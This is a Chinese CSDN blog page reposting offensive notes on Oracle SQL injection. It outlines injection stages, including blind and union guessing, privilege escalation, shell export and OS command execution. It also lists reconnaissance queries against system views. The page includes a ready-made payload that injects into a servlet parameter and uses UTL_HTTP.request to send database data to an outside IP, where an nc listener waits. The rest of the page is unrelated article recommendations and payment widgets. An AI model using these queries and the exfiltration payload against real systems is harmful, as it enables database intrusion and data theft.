黑客Un Oracle注射笔记-知己知彼百战不殆

最新推荐文章于 2024-06-19 17:06:48 发布
最新推荐文章于 2024-06-19 17:06:48 发布
阅读量435 收藏
点赞数
分类专栏: Oracle资料 文章标签: oracle 数据库 服务器 insert session windows

 Oracle说明:

        Oracle的注射攻击学习,可以归为:

a.基本猜解:

        1. 数据库名的猜解,表名的猜解,字段的猜解,数据的猜解.等基本数据的猜解.(半折法)

       2. union方式猜解

       3. UTL_HTTP.request反弹数据猜解.(需能上网)

       4. 其它方式的猜解,诸如把表段内容,update或insert入可以显示的字段里,诸如网页,然后读取获知.

b.高级攻击方式:

        1. 数据库提权攻击,一般是利用函数漏洞,提升为DBA权限.(oracle的DBA相当于mssql的sa,为数据库的最高权限)

       2. 导出shell攻击.

        3. 利用数据库漏洞,执行系统指定.

c.数据库漏洞.

        1. 远程溢出,本地提权等漏洞(我们只管exp)

       2. 存在的配置方面的漏洞整理,诸如默认弱口令,以及得到弱口令之后,如何提权等原因.


第一部份:

===================基本信息的猜解=========================

说明:

Oracle会把一些有用的信息保存在系统表里面,诸如all_tables,所以注射时对这些表的猜解,可以获取到很多的基本信息.

获得操作系统版本:

select member from v$logfile where rownum=1


通过路径方式判断操作系统.如果出现c:,d:类的是windows,其它为*nix


查看sid:

select instance_name from v$instance


查询当前用户权限

select * from session_roles


当前数据库版本

select banner from sys.v_$version where rownum=1


服务器出口IP

用utl_http.request可以实现


服务器监听IP

select utl_inaddr.get_host_address from dual


当前连接用户

select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual


反弹方式:(本机:nc -vv -lp 8000)

http://www.target.com/servlet/bbs2005.Userdetail?sUserName=test' and UTL_HTTP.request('http://59.151.22.37:8000/'||(select instance_name from v$instance where rownum=1))=1--

==================基本信息的猜===========================

基本信息的猜解主要是方便后期的注射攻击.


本篇文章来源于 中国协议分析网|www.cnpaf.net 原文链接:http://www.cnpaf.net/Class/hack/200811/23229.html

Zeroto
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑客攻击之网络入侵--物理攻击
m0_47635965的博客
05-19 5138
一、社会工程学攻击 目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造E-mail1、打电话请求密码n 尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。2、伪造E-mailn 使用telnet一个黑客可以截取任何一个身份证发送E-mail的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客
渗透学习笔记_黑客渗透笔记-CSDN博客.mhtml
05-15
渗透学习笔记_黑客渗透笔记-CSDN博客.mhtml
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 16万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
使用Termux安装黑客工具箱---Lazymux
两个月亮
10-16 1万+
使用Termux安装黑客工具箱---lazymux, git使用
Oracle】ORA-03113错误分析与解决
茄肥猫的窝
09-16 8165
前言 每一个DBA在进行数据库管理的过程中不可避免的要遇到形形色色的错误(ORA-1547 ,ORA-904,ORA-1578 ......)。有些错误由于频繁出现、原因复杂而被 Oracle DBA 们戏称之为"经典的错误"。其中ORA-3113 "end of file on communication channel" 就是这样的一个。 我们可以简单的把这个错误理解为Oracle
《增长黑客》- 读书笔记(四)增长黑客循环
机器学习,大数据
04-15 2585
文章目录1. 增长黑客循环2. 小结Reference 开展的实验越多,学到的东西也就越多。——《增长黑客》 在上一篇笔记中讲到,增长黑客方法的第二步是**通过北极星指标的确定与拆解,确定当前阶段产品的增长战略。**在确定增长方向后,就要开始进入增长黑客的第三步—— 快节奏地、周而复始地进行数据->假设->优先级->实验的增长黑客循环。 1. 增长黑客循环 增长黑客循环:...
【新手适用】mac os12 通过docker安装oracle详细步骤与踩坑笔记
whatevere的博客
08-26 3976
在CSDN里面虽然有很多Mac安装Oracle的教程,但是在实际安装过程中遇到了一些不理解的步骤或者小坑,然后又要额外去尝试很多其他的教程或者资料,所以:这篇文章主要是详细的安装步骤,再补充一些安装过程中的细节汇总,主要面向和我一样首次使用mac安装数据库,并且对期间涉及到的一些命令行语句和操作系统不太了解的小白。.........
网络安全(黑客)自学笔记
2301_77732591的博客
08-07 1万+
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
Winsdows黑客技术入门---简介
xusworld的专栏
08-24 7693
最近闲来无事,回顾了黑客帝国这部电影,又想起了自己儿时的黑客梦想,而且最近工作也不是很忙,心里想着做一系列教程来帮助有这方面兴趣的朋友入门,同时也巩固一下自己的知识。 注意事项: 1:此系列教程只适合菜鸟,大牛绕道。 2:因为编者水平实在有限,文中不少鉴戒其他书籍和博客的地方还请见谅,我的宗旨就是给读者展示最简洁的代码,最清晰的思路。 3:此系列教程仅供参考学习研究使用,如有勘误,欢迎大家批评指正。
黑客攻击的入口--端口
用心做事,用爱生活
11-27 6479
端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O缓冲区,端口是通过端口号来标记的,端口号只有整数,范围是从0到65535 端口可以看成是电脑与外界网络连接的一个门口端口的分类: 三大类: 一,公认端口 wellknownports:从0-1-23,他们紧密绑定与一些服务。通常这些端口的通讯明确表明了某种服务的协议。80端口实际上总是HTT
在GitHub上学黑客 --- 黑客成长技术清单
LoveSummer
07-06 3万+
这个开源项目是黑客的多合一工具包,包含了各种黑客工具,比如逆向工程、老鼠工具、SQL注入工具等等。声明:该开源项目仅限学习使用,勿用与从事违法活动。开源地址:https://github.com/Z4nzu/hackingtool这个开源项目是教程序员如何优雅地挣零花钱,本开源项目是一本电子书,从副业的重要性、到程序员可能得副业路径,以及知识付费、课程录制等实战案例为基础,打磨的一本程序员副业指南。开源地址:https://github.com/easychen/lean-side-bussiness“Aw
黑客角度检验oracle数据库
03-04
本文讨论的是从一种安全的角度来看黑客是如何攻击你的数据库,我们应该做什么防范。目录:StateofOracleSecurityListenerVulnerabilities-TnscmddemonstrationOracleinaWebapplication-SQLInjectionDemo...
黑客防线2015年1-6期杂志
11-18
黑客防线2015年1-6期杂志, 《黑客防线》是中国网络及计算机安全普及性电子媒体之一,而《黑客防线》网站则是杂志建设的大型网上媒体交互平台,也是目前中国大陆互联网上范围最广泛的中文安全类网站之一。
黑客帝国-------字符雨
08-13
字符雨, 基本照搬, 没啥好讲的
oracle中执行select ... for update需要什么权限?
lee_vincent1的博客
06-15 806
1、只需要select权限就能执行select…for update (不能提交修改,但会锁表),所以这里可能会被坑。2、完整执行select…for update 需要select+update 权限。
数据库-数据定义和操纵-DDL语言的使用
weixin_72982195的博客
06-17 541
唯一约束(Unique Key)是指所有记录中字段的值不能重复出现。唯一约束与主键约束相似的是它们都可以确保列的唯一性。唯一约束在一个表中可有多个,并且设置唯一约束的列允许有空值,但是只能有一个空值。而主键约束在一个表中只能有一个,且不允许有空值。
Oracle APEX开发小技巧1】转换类型实现显示小数点前的 0 以 及常见类型转换
clover_oreo的博客
06-16 426
转换类型实现显示小数点前的 0 以 及常见类型转换
Pgsql数据库之Linux环境备份Windows环境还原
最新发布
weixin_42949219的博客
06-19 347
是一个命令行工具,用于备份单个数据库。它可以生成一个SQL脚本文件,该文件包含了重建数据库所需的所有SQL命令。:PostgreSQL服务器的主机名或IP地址。:PostgreSQL服务器的端口号(默认为5432)。:用于连接到PostgreSQL的用户名。:输出格式为自定义格式(二进制格式),这种格式通常比纯文本SQL格式更小、更快且更灵活。:包括BLOBs(大对象)在备份中。:详细模式,显示更多输出信息。:指定输出文件的名称。:要备份的数据库名称。
oracle怎么样行转列?
weixin_41203765的博客
06-17 139
PIVOT:适用于固定数量的列转换,语法简洁。CASE语句:灵活,但需要更多的手动编码。UNPIVOT:用于列转行,不是直接的行转列方法,但提供完整性。XML方法:适用于动态列转置,但较为复杂。在选择使用哪种方法时,请根据您的具体需求、数据的动态性以及您对Oracle SQL的熟悉程度来决定。
黑客渗透笔记完整版 pdf
06-25
对于黑客渗透笔记完整版PDF,我们不能开展支持和鼓励。黑客攻击和设备渗透是非法的行为,破坏者通常会遭受法律追究。黑客行为对于网络安全和个人隐私产生了致命威胁。作为普通人,我们应该拒绝任何形式的黑客攻击和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值